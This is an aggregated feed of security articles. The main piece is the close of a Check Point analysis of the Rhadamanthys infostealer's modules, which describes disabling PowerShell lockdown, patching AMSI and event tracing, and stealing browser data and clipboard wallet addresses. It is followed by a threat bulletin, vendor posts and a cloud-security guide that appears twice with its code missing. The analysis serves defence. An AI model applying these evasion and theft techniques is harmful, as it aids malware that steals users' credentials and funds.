The current version has yet another module, loader.dll, that is also responsible for running .NET assemblies, but in a much simpler way, and outside of the plugin system. It expects two arguments – a pointer to a byte array representing the assembly, and the array size. Then, the passed assembly is simply invoked.

Figure 47 – Fragment of the function executing .NET assemblies – loader.dll, decompiled using dnSpy.

The “TaskCore” module

In the published changelog, the author advertises multiple changes in the task-running module:

14. The task module has been greatly upgraded, and a new plug-in module has been introduced to support users in secondary development of their own plug-ins.
Supports multiple task execution modes:
Normal execution
In Memory LoadPE Execution
Powershell Execution
DotNet Reflection Execution
DotNet Extension Execution
DotNet Extension with Zip Execution
VbScript Execution
JScript Execution
X86 shellcode execution
X64 shellcode execution
Native Plugin Loader

Indeed, we can see the new module taskcore.bin which was added in this release. Depending on the specific command passed from the C2, it may be run under the guise of multiple applications, such as: AppLaunch.exe, dllhost.exe, rundll32.exe, OpenWith.exe, notepad.exe, rkeywiz.exe, wmpntwrk.exe, wmpconfig.exe.

Similar to coredll.bin, it comes with RC4-encrypted strings. The list of decrypted strings (format: RVA, string) is given below:

https://gist.github.com/hasherezade/47fa641d054d82de4059ff36c7e99918

As the module is in the XS2 format. The start function first finishes the initialization, then deploys the core functionality of the modules, i.e. command parsing. Each command is responsible for executing a module of a particular type.

Figure 48 – Switch-case parsing the commands from the C2 received by the taskcore module.

The passed structure contains parameters filled in by the coredll.bin, and the mapping contains the buffer with a module to be executed that was received from the C2. While some of the other modules interact only with the coredll.bin, this one is also capable of establishing its own connection with the C2 and reports there directly.

As the author mentioned, the module is able to run a variety of content formats.

The simplest of them is running shellcodes.

Figure 49 – A function within taskcore.bin, executing simple shellcodes.

Scripts, such as JScripts and VBScripts, are both executed by the same function:

Figure 50 – Fragment of a function within taskcore.bin, executing JScripts and VBScripts.

Underneath, it uses a COM interface and parses the given script with the help of a function ParseScriptText.

Figure 51 – Parsing and executing scripts using the COM interface.

Similar to the previously mentioned stubmod.bin (”Stealing from KeePass”), the .NET environment is manually initialized. It is then it is used to run PowerShell scripts as well as plugins in the custom format (that are delivered in the form of .NET assemblies).

Figure 52 – Function leading to the execution of a plugin (.NET assembly).

Before running the PowerShell scripts, the malware zeroes out the Environment Variable _PSLockdownPolicy. This modification disables the PowerShell lockdown policy, which is a security feature restricting the execution of certain actions within the PowerShell environment. As a result, this allows more freedom in execution of scripts.

Figure 53 – Function leading to the execution of a PowerShell script.

The module also disables other security-related features: for example, it patches out AMSI checks and event tracing in NTDLL.

Analyzing the strings

The functionality of the modules is vast, but because we dumped and deobfuscated all the strings, we can get a good overview of different aspects of the modules by reviewing them. Selected artifacts described below.

SQLite library

There are multiple strings indicating that the module comes with a statically linked SQLite library. The presence of SQLite modules in malware strongly suggests that it steals cookies, as cookies are kept in local SQLite databases. The Rhadamanthys core comes with the version string, which leads to the particular commit of the SQLite: https://www3.sqlite.org/src/info/fe7d3b75fe1bde41 (updated since the previous version of the malware, which used an earlier commit: https://www2.sqlite.org/src/info/8180e320ee4090e4)

SQLite format 3
2016-04-08 15:09:49 fe7d3b75fe1bde41511b323925af8ae1b910bc4d

In addition to the artifacts pointing to the library itself, we can see some queries among the decrypted strings, such as the following:

SELECT title, url FROM (SELECT * FROM moz_bookmarks INNER JOIN moz_places ON moz_bookmarks.fk=moz_places.id)
SELECT url FROM (SELECT * FROM moz_annos INNER JOIN moz_places ON moz_annos.place_id=moz_places.id) t GROUP BY place_id

Those queries are used for retrieving Mozilla browsing history and will be applied on the found database. They are part of the stealer described in “Stealing from Chrome and Mozilla products”.

Mbed-Crypto

We can find multiple strings suggesting that the malware makes use of a statically linked library with Elliptic curves. Some of the strings can help uniquely identify the library and its version.

8335DC163BB124B65129C96FDE933D8D723A70AADC873D6D54A7BB0D
14DEF9DEA2F79CD65812631A5CF5D3ED

It turns out to be Mbed Crypto (source), an old version of the library now renamed Mbed TLS.

The source file referencing the found strings can be seen on the project’s Github: [reference 1] [reference 2]. Note that the mentioned strings are not present in the new version of the library (under the new name Mbed-TLS) which suggests that the malware author used the old copy.

After analyzing the application, we know that this library is used to establish the TLS connection with the C2.

CJSON Library

Some unencrypted strings suggest the use of JSON, implemented by the statically linked library cJSON:

cjson
BUG: Unable to fetch CJSON configuration
JSON parser does not support UTF-16 or UTF-32
‘[‘ or ‘{‘ expected
unexpected token
‘}’ expected
‘:’ expected
string or ‘}’ expected
‘]’ expected

Looking further at the context in which those strings are used, we can see that the JSON format was applied to create reports about the stolen content, that was retrieved by the LUA scripts. We can also find relevant artifacts among the decrypted strings:

e7bcc,'{“root”:’
e7bb0,’root’
e7d58,’profile’
e3814,’username’
e37f8,’password’
e7d40,’openvpn’

Artifacts from 360 Browser Password stealer

Among unencrypted strings, we see the following strings that can be found in the open-source 360 Browser Password decoder.

cf66fb58f5ca3485
(4B01F200ED01)

The first of the strings is an AES key that is used for decrypting the password. The second is the prefix of the encrypted password that needs to be dropped.

A snippet from a Chinese website

One of the strings is quite unusual, and looks like along key or an obfuscated content:

0a{1b2c3d$4e5f6g7h_8@i9jAkBl`CmDnEo[FpGqHrI~s-JtKuLvMw%NxOyPz(Q9R8S7T6)U5V4]W3X2}Y1Z0

However, Googling for it gives few results only, leading to a Chinese website with a simple code snippet. The snippet illustrates how to generate a random file name, and the aforementioned string is just used as a charset. The implementation used in Rhadamanthys is not identical, but has analogous functionality:

Figure 54 – Function generating a random file name.

The string is referenced in the fragment of code responsible for generating names for the additional executables downloaded from the C2 that are dropped and executed.

This piece of code is not particularly interesting, but the choice is unusual and may give a subtle hint that the author is a Chinese speaker. Hovewer, it is not enough to draw any conclusions.

Additions in the version 0.5.1

During the writing of this article, the author already released version 0.5.1. The newest version contains additions such as a Clipper plugin, which watches a clipboard and replaces wallet addresses with attackers’ addresses. This version enables even more customization – distributors can order private stubs, prepared especially for them.

Figure 55 – Announcement about the version 0.5.1, published on author’s Telegram account.

List of changes, as presented by the author:

1.Added Clippers plug-in
2.Telegram notification, you can now choose whether to send wallet crack and seed records in the log ZIP
3.Google Account Cookie Recovery
4.Default build stub cleaning for Windows Defender, including cloud protection

We can already see that the Clipper plugin supports a rich set of targets.

Figure 56 – List of the applications attacked by the Clipper plugin (added in version 0.5.1).

Conclusion

Rhadamanthys is a well-designed, modular stealer. In this article, we presented some details of its implementation, showing the incorporated techniques and execution flow. Although the core component comes with a lot of interesting built-in features, the power of this malware lies in its extensibility.

The currently analyzed version 0.5.0 supports multiple scripting languages, from LUA (whose interpreter is built-in to the main module) to PowerShell and other scripting languages, that are supported via an additional module.

As we can see, the author keeps enriching the set of available features, trying to make it not only a stealer but a multipurpose bot, by enabling it to load multiple extensions created by a distributor. The added features, such as a keylogger, and collecting information about the system, are also a step towards making it a general-purpose spyware.

It is evident that with the fast pace and ongoing development, Rhadamanthys is trying hard to become a big player on the malware market and is most likely here to stay.

Check Point customers remain protected from the threats described in this research.

Check Point’s Threat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems and has developed and deployed a signature to detect and protect customers against threats described in this research.

Check Point’s Harmony Endpoint provides comprehensive endpoint protection at the highest security level, crucial to avoid security breaches and data compromise. Behavioral Guard protections were developed and deployed to protect customers against threats described in this research.

BG:

InfoStealer.Wins.Rhadamanthys.E/F

BS:

InfoStealer.Wins.Rhadamanthys.C/D/G

TE/Harmony Endpoint protections:

InfoStealer.Wins.Rhadamathys.C/D/G

IOC/Analyzed samples

IDHashModule typeFormat#1.1bb8bbcc948e8dca2e5a0270c41c062a29994a2d9b51e820ed74d9b6e2a01ddcfStage 1 (version 0.5.0)PE#1.2.122a67f510dfb7ca822b5720b89cd81abfa5e63fefa1cdc7e266fbcbb0698db33Stage 2: main moduleXS1#1.2.26ed3ac428961b350d4c8094a10d7685578ce02c6cd41cc7f98d8eeb361f0ee38dt.x86.binXS1#1.2.34fd469d08c051d6997f0471d91ccf96c173d27c8cff5bd70c3f2c5008faa786fearly.x86.binXS1#1.2.4633b0fe4f3d2bfb18d4ad648ff223fe6763397daa033e9c5d79f2cae89a6c3b2early.x64.binXS1#1.2.550b1f29ccdf727805a793a9dac61371981334c4a99f8fae85613b3ee57b186d2phexec.binXS1#1.2.601609701a3ea751dc2323bec8018e11742714dc1b1c2dcb39282f3c4a4537c7dnetclient.x86.binXS1#1.2.7a905226a2486ccc158d44cf4c1728e103472825fb189e05c17d998b9f5534d63proto_x86.binshellcode#1.2.8ed713454c20844522304c49cfe25fe1490418c300e5ab0c9fca431ede1e91d7bstrategy.x86.binXS1#1.2.9f82ec2246dde81ca9edb69fb9c7ce3f7101f5ffcdc3bdb86fea2a5373fb026fbunhook.binXS1#1.3.1ee4a487e78f23f5dffc35e73aeb9602514ebd885eb97460dd26635f67847bd16Stage 3: main stealer component: “coredll.bin” (32-bit)XS2#1.3.2fcb00beaa88f7827999856ba12302086cadbc1252261d64379172f2927a6760eStage 3 submodule: “KeePassHax.dll”PE#1.3.3a87032195e38892b351641e08c81b92a1ea888c3c74a0c7464160e86613c4476Stage 3 submodule: “runtime.dll”PE#1.3.43d010e3fce1b2c9ab5b8cc125be812e63b661ddcbde40509a49118c2330ef9d0Stage 3 submodule: “loader.dll”PE#1.3.5ecab35dfa6b03fed96bb69ffcecd11a29113278f53c6a84adced1167b66abe62Stage 3 submodule: “stubmod.bin” (32-bit)XS2#1.3.65890b47df83b992e2bd8617d0ae4d492663ca870ed63ce47bb82f00fa3b82cf9Stage 3 submodule: “taskcore.bin” (32-bit)XS2#1.3.72b6faa98a7617db2bd9e70c0ce050588c8b856484d97d46b50ed3bb94bdd62f7Stage 3 submodule: “stubexec.bin” (32-bit)XS2#1.3.8f1f33618bbb8551b183304ddb18e0a8b8200642ec52d5b72d3c75a00cdb99fd4Stage 3: main stealer component: “coredll.bin” (64-bit)XS2

Appendix

Our other writeups on Rhadamanthys:

[1] “From Hidden Bee to Rhadamanthys – The Evolution of Custom Executable Formats”.

[2] “Rhadamanthys: The”Everything Bagel” Infostealer”

More about used techniques:

[3] https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls

[4] https://media.defcon.org/DEF CON 30/DEF CON 30 presentations/Tarek Abdelmotaleb Dr. Bramwell Brizendine – Weaponizing Windows Syscalls as Modern 32-bit Shellcode – paper.pdf

[5] https://whiteknightlabs.com/2021/12/11/bypassing-etw-for-fun-and-profit/

[6] https://www.malwarebytes.com/blog/news/2018/01/a-coin-miner-with-a-heavens-gate

[7] https://www.codeproject.com/Articles/11003/The-coding-gentleman-s-guide-to-detecting-the-NET

[8] https://codingvision.net/calling-a-c-method-from-c-c-native-process

[9] https://communities.bentley.com/products/programming/microstation_programming/f/archived-microstation-v8i-programming-forum/64713/write-a-com-server-in-c—call-from-vba-c-or-c-or-vb-net

The post Rhadamanthys v0.5.0 – a deep dive into the stealer’s components appeared first on Check Point Research.

Check Point Research – ​Read More

11th December – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 11th December, please download our Threat_Intelligence Bulletin.

TOP ATTACKS AND BREACHES

The American Greater Richmond Transit Company (GRTC), which provides services for millions of people, has been a victim of cyber-attack that impacted certain applications and parts of the GRTC network. The Play ransomware gang claimed responsibility for the attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.Play; Ransomware.Wins.PLAY)

Multinational retailer Aldo has acknowledged a ransomware attack that impacted the systems of an unspecified franchise partner. The LockBit ransomware gang has claimed responsibility for the attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Wins.LockBit.ta*; Ransomware.Win.Lockbit; Gen.Win.Crypter.Lockbit.AI, Ransomware_Linux_Lockbit)

AlphV (aka BlackCat) ransomware gang claimed responsibility for cyber-attacks on three victims: American medical provider Norton Healthcare; IT services and business consulting company HTC Global Services; and Tipalti, an Israeli fintech software provider startup with headquarters in Canada. The attack on Tipalti has allegedly resulted in the compromise of over 265GB of confidential information belonging to the company and its customers, including the video game Roblox and streaming platform Twitch. According to AlphV, an insider from Tipalti was and is still actively involved in the attack.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Ransomware.Win.BlackCat; Ransomware.Wins.BlackCat.ta*, Ransomware_Linux_BlackCat,)

American multinational confectionery company Hershey has disclosed a data breach that affected more than 2,200 people as the result of a successful email phishing attack against the company. The stolen data potentially includes full names, health and medical details, debit and credit card data, financial account information and more.
Japanese car manufacturer Nissan has confirmed a cyber-attack that affected Nissan Oceania, its Australian and New Zealand regional division, and took systems offline as a precaution. The company did not share specific information on the type or extent of the breach.
The Hunters International ransomware group claimed responsibility for cyber-attacks on the Australian shipbuilder Austal USA and Florida water agency, St. Johns River Water Management District. The attacks affected Florida water agency’s information technology environment and potentially impacted Austal’s USA documents, recruiting information, finance details, certifications, and engineering data.

VULNERABILITIES AND PATCHES

Google’s December 2023 Android security update addresses 85 vulnerabilities, notably including a critical zero-click remote code execution flaw (CVE-2023-40088) in the Android System component. The update addresses 84 other security vulnerabilities, with three critical ones related to privilege escalation and information disclosure in Android Framework and System components (CVE-2023-40077, CVE-2023-40076, and CVE-2023-45866), and another critical flaw in Qualcomm’s closed-source components (CVE-2022-40507).
Atlassian has released software fixes to address four critical vulnerabilities that could lead to remote code execution (RCE). These flaws include a deserialization vulnerability in the SnakeYAML library (CVE-2022-1471), and RCE vulnerabilities in Confluence Data Center and Confluence Server, Assets Discovery for Jira Service Management and in Atlassian Companion app for macOS (CVE-2023-22522, CVE-2023-22524, CVE-2023-22523).

THREAT INTELLIGENCE REPORTS

Check Point Research has examined various attack vectors in modern Outlook and compared the user interoperability required for each scenario when attackers use Outlook to deliver their exploits. The attack vectors have been observed in three categories: the “obvious” Hyperlink attack vector, the “normal” attachment attack vector, and the “advanced” attack vector.

Check Point Threat Emulation and IPS provide protection against this threat.

Check Point Research has identified a shift in the targeting of the Iranian hacktivist proxies which are now extending their cyber operations to include targets in other countries besides Israel, with a particular emphasis on the United States. Moreover, groups such as CyberAv3ngers and Cyber Toufan appear to be adopting a narrative of retaliation in their cyberattacks. They claim to target US entities using Israeli technology, suggesting a strategy of simultaneously targeting both Israeli and US interests.
Check Point Research exposes a troubling trend in the cryptocurrency landscape. Deceptive actors are manipulating pool liquidity, sending token prices soaring by 22,000%. The manipulation of pool liquidity resulted in a swift and calculated theft of $80,000 from unsuspecting token holders. This incident sheds light on the evolving strategies scammers employ to exploit decentralized finance platforms.
The Russia-based actor Star Blizzard (aka COLDRIVER/Callisto Group) persistently employs spear-phishing attack techniques for information-gathering purposes. The threat actor has been observed targeting individuals and organizations in the UK and US that involved in international affairs, defense, and logistics support to Ukraine.

The post 11th December – Threat Intelligence Report appeared first on Check Point Research.

Check Point Research – ​Read More

Accelerating security outcomes with a cloud-native SIEM

As organizations modernize their IT infrastructure and increase adoption of cloud services, security teams face new challenges in terms of staffing, budgets and technologies. To keep pace, security programs must evolve to secure modern IT environments against fast-evolving threats with constrained resources. This will require rethinking traditional security strategies and focusing investments on capabilities like cloud security, AI-powered defense and skills development. The path forward calls on security teams to be agile, innovative and strategic amidst the changes in technology and cyber risks.

To meet these security demands, security teams must focus on three critical transformations:

Evolution from closed vendor ecosystems to open, collaborative, community-powered defense
Scaling security expertise with AI and automation
Evolution from tool-focused defense to analyst-powered outcomes

One of the most effective steps toward modernizing a security operations program is upgrading the core SIEM platform. As the central nervous system for SOC teams, the SIEM collects, correlates and analyzes data from across the IT environment to detect threats. Optimizing this capability by implementing a cloud-native SIEM or augmenting an on-premises system lays the digital foundation needed to scale security efforts.

With a high-fidelity view of security alerts and events via an upgraded SIEM, organizations gain the visibility and context required to identify and respond to cyber risks no matter the source. Prioritizing improvements here accelerates the transformation of siloed security practices into an integrated, intelligence-driven function poised to address both current and emerging challenges.

Open defense: Finding the real “threat needles” hidden in the “security-data haystack”

The explosion of data has increased the attack surface—a most significant side effect that has costly ripple effects. More data. More alerts. More time needed to sift through alerts.

The SIEM plays a critical role in analyzing this data—however, the reality of sending this volume of data to the SIEM for analysis is becoming increasingly challenging, particularly across multiple clouds. In some cases, sending all of the data is not necessary. With the evolution of cloud, and identity and data security tools in the cloud, there is often only a need to collect alerts from these systems and import those into the SIEM, as opposed to ingesting all data.

Today’s SIEMs should be designed around open standards and technologies so they can easily collect only key insights, while still providing the security team with access to the underlying telemetry data when needed.

In many cases, no such detection is required; in other cases, a security team only needs to collect data to do further specific threat analysis. In these cases, a SIEM with real-time data collection, data warehousing capabilities designed for analysis of cloud-scale data, optimized for real-time analytics and sub-second search times is the solution. Organizations need access to their data on-premises and in the cloud without dealing with vendor and data locking.

This open approach to SIEM helps organizations leverage existing investments in data lakes, logging platforms and detection technologies. It also ensures that organizations have the flexibility they need to choose the right data retention and security tools as their security infrastructure matures.

However, increased visibility into the data is only one part of the solution. Security teams need accurate and current detection logic to find threats because security teams are currently facing challenges in their skills to detect threats in a timely manner. Incorporating regularly updated threat intelligence enables the analyst to accelerate their threat detection. And, leveraging a common, shared language for detection rules like SIGMA, allows clients to quickly import new, validated detections directly crowdsourced from the security community as threats evolve.

AI and automation to accelerate threat detection and response

Most organizations are detecting malicious behaviors in a SIEM or other threat-detection technologies such as EDR, but in fact, SOC professionals get to less than half (49%) of the alerts that they’re supposed to review within a typical workday, according to a recent global survey. Leveraging automation and AI ensures transparency and provenance in recommendations and insights that can help security teams address high-priority alerts and deliver desired outcomes.

To do this, a SIEM needs to employ innovative risk-based analytics and automated investigation powered by graph analytics, threat intelligence and insights, federated search, and artificial intelligence. Effective SIEM platforms must leverage artificial intelligence to augment human cognition. Self-tuning capabilities reduce noisy alerts to focus analyst attention where it’s needed most. Virtual assistance can help handle routine triage to allow security experts to pursue strategic initiatives and robust machine learning models can uncover hidden attack patterns and incidents that rules-based systems miss. Some of the most advanced SIEMs enrich and correlate findings from across an organization’s environment so analytics are automatically focused on the attacks that matter most.

In order to build the required trust with security teams, a SIEM needs to provide transparency and provenance in its recommendations and insights. By including explainability into how each assessment was made, security analysts can have the confidence to trust recommendations and act more quickly and decisively on threats in their environment.

Another aspect vendors need to consider when developing a SIEM for today is the shift of moving the decisions and response actions to the analysts performing initial alert analysis from the responder. In many cases, they are looking to fully automate where balance of risk is right for the organization. Such processes and decisions are traditionally coordinated and tailored appropriately in a separate SOAR system, and in some cases with a different team. Today’s SIEM needs to be able to enable a more agile shift left to incorporate full SOAR capabilities in the SIEM workflow and UX. This approach enables organizations to almost fully automate response processes based on their balance of risk and, where needed, introduce the security team into the process to verify the recommended actions.

Evolving from tool-focused to analyst-focused defense

Early SIEM platforms centered on collecting and correlating vast streams of security data. These first-generation systems excelled at log aggregation but overloaded analysts with excessive alerts rife with false positives. Attempting to keep pace, teams added new tools to manage incidents, track threats and automate tasks. But this tech-driven approach created complex, fragmented environments that diminished productivity.

Modern SIEM solutions shift focus to the human analyst’s experience throughout the threat lifecycle. Rather than produce more data points, next-generation platforms leverage AI to find signals in the noise. Cloud-based analytics uncover hard-to-identify attack patterns to feed predictive capabilities and enrich findings from across an organization’s environment so analysts can focus on the attacks that matter most. To effectively work inside the analyst workflow, open architectures and integrated system visibility must be embedded in every SIEM.

In the instance of a modern SIEM, the tools and technologies work to serve the analyst—and not the other way around.

Introducing the new cloud-native IBM QRadar SIEM— thoughtfully engineered to help analysts succeed

At IBM, we recognize that having the most powerful technology means nothing if it burdens the analyst with complexity. We also recognize that SIEM technologies have often promised to be the “single pane of glass” into an organization’s environment—a promise that our industry needs fulfilled.

That’s why we built the new cloud-native QRadar SIEM with the analyst in mind. QRadar SIEM leverages a new user interface that fuses the primary workflows from threat intelligence, SIEM, SOAR and EDR into a single, seamless workflow. Not only does this deliver significant productivity improvements but it also removes the burden of switching between tools, dealing with false positives and inefficient workflows. When analysts have the right tools and context, they can move with speed and precision to stop sophisticated attacks.

This new cloud-native edition of QRadar SIEM not only builds on the data collection and threat detection of the current QRadar SIEM edition, but it also includes all the elasticity, scalability and resiliency properties of a cloud-native architecture. With openness, enterprise-grade AI and automation, and a focus on the analyst, QRadar SIEM (Cloud-Native SaaS) can help maximize your security team’s time and talent, ultimately delivering better security outcomes.

Explore the new cloud-native QRadar SIEM

The post Accelerating security outcomes with a cloud-native SIEM appeared first on Security Intelligence.

Security Intelligence – ​Read More

Best practices for cloud configuration security

Cloud computing has become an integral part of IT infrastructure for businesses of all sizes, providing on-demand access to a wide range of services and resources. The evolution of cloud computing has been driven by the need for more efficient, scalable and cost-effective ways to deliver computing resources.

Cloud computing enables on-demand access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications and services) over the internet. Instead of owning and maintaining physical hardware and infrastructure, users can leverage cloud computing services provided by third-party providers.

Cloud service and deployment models

Cloud computing is commonly categorized into service and deployment models:

Service models

Infrastructure as a Service (IaaS): Provides virtualized computing resources over the internet. Users can rent virtual machines and storage and networking components.
Platform as a Service (PaaS): Offers a platform that includes tools and services for application development, testing and deployment. Users can focus on building applications without managing the underlying infrastructure.
Software as a Service (SaaS): Delivers software applications over the internet on a subscription basis. Users access the software through a web browser without worrying about installation or maintenance.

Deployment models

Public cloud: A third-party cloud service provider owns and operates resources and makes them available to the general public. Some providers include Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform.
Private cloud: A single organization exclusively uses resources. Either the organization or a third-party provider can manage the infrastructure, which can be located on-premises or off-site.
Hybrid cloud: Combines public and private cloud models to allow data and applications to be shared between them. This provides greater flexibility and optimization of existing resources and infrastructure.

4 common cloud attack scenarios

Unfortunately, every rapidly growing industry attracts not only enthusiastic entrepreneurs but also malicious actors whose goal is to take advantage of any security holes that would be unable to defend against various attacks. Here are some examples of common attack scenarios in the cloud.

1. DDoS attacks

A distributed denial of service (DDoS) attack occurs when a web application is overloaded with a high volume of traffic. DDoS protection services, like AWS Shield, can mitigate such attacks.

AWS Shield uses machine learning algorithms to analyze incoming traffic, identify patterns indicative of a DDoS attack and take action to stop the attack.

2. Data breaches

A data breach involves exploiting vulnerabilities to access and exfiltrate sensitive data. But regularly updating software, encrypting sensitive data, monitoring for unusual activity and building a good incident response can help prevent data breaches.

Below is an incident response example code (AWS Lambda for Incident Response) in Python (Boto3 is a Python software development kit [SDK] for AWS).

3. Man-in-the-middle attacks

A man-in-the-middle (MitM) attack occurs when communication between two parties is intercepted for malicious intent. The use of encryption (SSL/TLS) and implementing secure communication protocols can help prevent a MitM attack. Without encryption, data transmitted over the network can be intercepted.

The code below is an example of encrypting S3 Objects with AWS SDK for Python-Boto3.

4. Brute force attacks

A brute force attack is a hacking method that uses trial and error to crack passwords, login credentials and encryption keys. It is a simple yet reliable tactic for gaining unauthorized access to individual accounts and organizational systems and networks.

AWS CloudWatch Alarms can provide logging and monitoring services where repeated login attempts might go unnoticed.

Cloud configuration security best practices

Security in cloud computing involves implementing measures to protect data, applications and infrastructure in a cloud environment from potential threats. Here are some best practices in key areas of cloud configurations in AWS and Azure associated with securing cloud environments.

 AWS

 Identity and access management (IAM):

Use the principle of least privilege when assigning permissions to users, roles and groups
Regularly review and audit IAM policies to align with business requirements
Enable multi-factor authentication (MFA) for enhanced user authentication.

Example AWS IAM policy:

If IAM policies are not properly configured, an attacker might gain access to sensitive resources.

VPC (virtual private cloud) configuration:

Utilize separate subnets for public and private resources.

 Example code (AWS CloudFormation):

S3 Bucket Security:

Regularly audit and review access controls for S3 buckets
Enable versioning and logging to track changes and access to objects
Consider using S3 bucket policies to control access at the bucket level
Enforce server-side encryption for S3 buckets.

Example code (AWS CLI):

Azure

Azure role-based access control (RBAC):

Assign the principle of least privilege using Azure RBAC.

 Example code (Azure PowerShell):

Azure Blob storage security:

Enable Blob storage encryption.

 Example code (Azure PowerShell):

 Azure virtual network:

Implement network security groups (NSGs) for access control.

 Example code (Azure Resource Manager Template):

Keeping digital assets secure in the cloud

Securing cloud configurations is essential to safeguard digital assets and maintain a resilient cybersecurity posture. Organizations should focus on continuous monitoring, compliance checks and proactive incident response planning to address the dynamic nature of cyber threats in the cloud.

In addition, implementing the principles of least privilege, encryption, identity and access management and network security best practices not only protects the cloud environment against potential vulnerabilities but also contributes to a culture of security awareness and responsiveness within the organization.

As cloud computing continues to evolve, organizations should commit to staying ahead of emerging security challenges and adapting configurations to maintain a resilient and secure digital presence.

Not sure how to start? IBM Security has a range of cloud security services to protect your cloud environment.

The post Best practices for cloud configuration security appeared first on Security Intelligence.

Security Intelligence – ​Read More

   Best practices for cloud configuration security

Cloud computing has become an integral part of IT infrastructure for businesses of all sizes, providing on-demand access to a wide range of services and resources. The evolution of cloud computing has been driven by the need for more efficient, scalable and cost-effective ways to deliver computing resources.

Cloud computing enables on-demand access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications and services) over the internet. Instead of owning and maintaining physical hardware and infrastructure, users can leverage cloud computing services provided by third-party providers.

Cloud service and deployment models

Cloud computing is commonly categorized into service and deployment models:

Service models

Infrastructure as a Service (IaaS): Provides virtualized computing resources over the internet. Users can rent virtual machines and storage and networking components.
Platform as a Service (PaaS): Offers a platform that includes tools and services for application development, testing and deployment. Users can focus on building applications without managing the underlying infrastructure.
Software as a Service (SaaS): Delivers software applications over the internet on a subscription basis. Users access the software through a web browser without worrying about installation or maintenance.

Deployment models

Public cloud: A third-party cloud service provider owns and operates resources and makes them available to the general public. Some providers include Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform.
Private cloud: A single organization exclusively uses resources. Either the organization or a third-party provider can manage the infrastructure, which can be located on-premises or off-site.
Hybrid cloud: Combines public and private cloud models to allow data and applications to be shared between them. This provides greater flexibility and optimization of existing resources and infrastructure.

4 common cloud attack scenarios

Unfortunately, every rapidly growing industry attracts not only enthusiastic entrepreneurs but also malicious actors whose goal is to take advantage of any security holes that would be unable to defend against various attacks. Here are some examples of common attack scenarios in the cloud.

1. DDoS attacks

A distributed denial of service (DDoS) attack occurs when a web application is overloaded with a high volume of traffic. DDoS protection services, like AWS Shield, can mitigate such attacks.

AWS Shield uses machine learning algorithms to analyze incoming traffic, identify patterns indicative of a DDoS attack and take action to stop the attack.

2. Data breaches

A data breach involves exploiting vulnerabilities to access and exfiltrate sensitive data. But regularly updating software, encrypting sensitive data, monitoring for unusual activity and building a good incident response can help prevent data breaches.

Below is an incident response example code (AWS Lambda for Incident Response) in Python (Boto3 is a Python software development kit [SDK] for AWS).

3. Man-in-the-middle attacks

A man-in-the-middle (MitM) attack occurs when communication between two parties is intercepted for malicious intent. The use of encryption (SSL/TLS) and implementing secure communication protocols can help prevent a MitM attack. Without encryption, data transmitted over the network can be intercepted.

The code below is an example of encrypting S3 Objects with AWS SDK for Python-Boto3.

4. Brute force attacks

A brute force attack is a hacking method that uses trial and error to crack passwords, login credentials and encryption keys. It is a simple yet reliable tactic for gaining unauthorized access to individual accounts and organizational systems and networks.

AWS CloudWatch Alarms can provide logging and monitoring services where repeated login attempts might go unnoticed.

Cloud configuration security best practices

Security in cloud computing involves implementing measures to protect data, applications and infrastructure in a cloud environment from potential threats. Here are some best practices in key areas of cloud configurations in AWS and Azure associated with securing cloud environments.

 AWS

 Identity and access management (IAM):

Use the principle of least privilege when assigning permissions to users, roles and groups
Regularly review and audit IAM policies to align with business requirements
Enable multi-factor authentication (MFA) for enhanced user authentication.

Example AWS IAM policy:

If IAM policies are not properly configured, an attacker might gain access to sensitive resources.

VPC (virtual private cloud) configuration:

Utilize separate subnets for public and private resources.

 Example code (AWS CloudFormation):

S3 Bucket Security:

Regularly audit and review access controls for S3 buckets
Enable versioning and logging to track changes and access to objects
Consider using S3 bucket policies to control access at the bucket level
Enforce server-side encryption for S3 buckets.

Example code (AWS CLI):

Azure

Azure role-based access control (RBAC):

Assign the principle of least privilege using Azure RBAC.

 Example code (Azure PowerShell):

Azure Blob storage security:

Enable Blob storage encryption.

 Example code (Azure PowerShell):

 Azure virtual network:

Implement network security groups (NSGs) for access control.

 Example code (Azure Resource Manager Template):

Keeping digital assets secure in the cloud

Securing cloud configurations is essential to safeguard digital assets and maintain a resilient cybersecurity posture. Organizations should focus on continuous monitoring, compliance checks and proactive incident response planning to address the dynamic nature of cyber threats in the cloud.

In addition, implementing the principles of least privilege, encryption, identity and access management and network security best practices not only protects the cloud environment against potential vulnerabilities but also contributes to a culture of security awareness and responsiveness within the organization.

As cloud computing continues to evolve, organizations should commit to staying ahead of emerging security challenges and adapting configurations to maintain a resilient and secure digital presence.

Not sure how to start? IBM Security has a range of cloud security services to protect your cloud environment.

The post    Best practices for cloud configuration security appeared first on Security Intelligence.

Security Intelligence – ​Read More

How the White House sees the future of safeguarding AI

On October 30, 2023, President Biden issued an executive order (EO) to set new standards for the safety and security of Artificial Intelligence (AI). The move sets out the government’s intentions to regulate and further advance the growth of AI technology in the years ahead.

Yet the question remains if it goes far enough to protect the American public from AI’s exponential development — and if it does, will this stance from the president’s office stifle the nation’s ability to remain the leading force in AI’s evolution?

What the executive order means for the future of AI

Since the middle of 2022, AI has quickly infiltrated almost every industry. The rapid evolution in AI technology has led to a huge boom in business opportunities and new jobs — early reports suggest AI could contribute nearly $16 trillion to the global economy by 2030.

But many fear the impact this evolving tech may have on individuals and industries alike. The executive order is the Biden administration’s first significant step in countering any negative repercussions of AI.

White House Deputy Chief of Staff Bruce Reed claims, “It’s the next step in an aggressive strategy to do everything on all fronts to harness the benefits of AI and mitigate the risks.”

Key inclusions of this executive order

The lengthy document provides a sweeping set of regulatory principles. This new executive order is ambitious, outlining the government’s intentions to use AI to achieve several key goals:

New standards for AI safety and security
Protecting the American public’s privacy
Advancing equity and civil rights
Supporting the American workforce
Promoting innovation and competition
Advancing American leadership abroad
Ensuring responsible and effective government use of AI.

Let’s take a closer look at some notable inclusions of Biden’s Executive Order:

Labeling AI-generated content

With more AI-generated content created by the day, it’s becoming more challenging for the general public to discern between what is real and what is not. This mandate offers guidance on watermarking and clearly labeling AI-generated content so Americans can easily understand which ads, content and communications are authentic.

Supporting the American workforce

